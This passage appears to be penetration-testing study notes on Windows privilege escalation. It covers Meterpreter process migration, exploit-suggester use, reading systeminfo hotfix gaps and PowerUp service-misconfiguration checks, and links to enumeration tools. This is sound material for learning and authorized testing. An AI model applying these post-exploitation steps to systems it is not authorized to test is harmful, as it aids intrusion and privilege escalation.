      • Run the command ps
        • This lists all the processes being run as well as their architecture
        • Look for processes that are x64 and have a value of 1 in the Session column
        • Session 1 is the interactive user's desktop session (session 0 is where services run)
      • migrate <PID>
        • Migrates the Meterpreter session into that process
      • Run the module again and note the suggestions; exploits that show up in both the 32-bit and 64-bit lists have a high chance of working

Windows Enumeration without Meterpreter

systeminfo - cmd.exe
  • Look for the OS version and the hotfixes
    • If no hotfixes are applied (it says "N/A") the box has probably never been updated since it was installed, so it's likely vulnerable to something
      • Correlate the age of the OS with the years that exploits came out
        • For example, a Windows 7 box with no updates since release (2009) is a good match for the list the Metasploit module provides, since nothing it suggests has been patched.
PowerShell Module - PowerUp
  • Mainly looks at privesc through service misconfigurations (weak service permissions, unquoted service paths, writable service binaries), not through missing patches like the Metasploit module
    • Windows Enumeration
      • Scripts
        • https://github.com/joshruppe/winprivesc
        • https://github.com/GDSSecurity/Windows-Exploit-Suggester
        • https://github.com/pentestmonkey/windows-privesc-check
      • Cheat-sheets
        • https://www.joshruppe.com/basic-windows-enumeration
        • http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html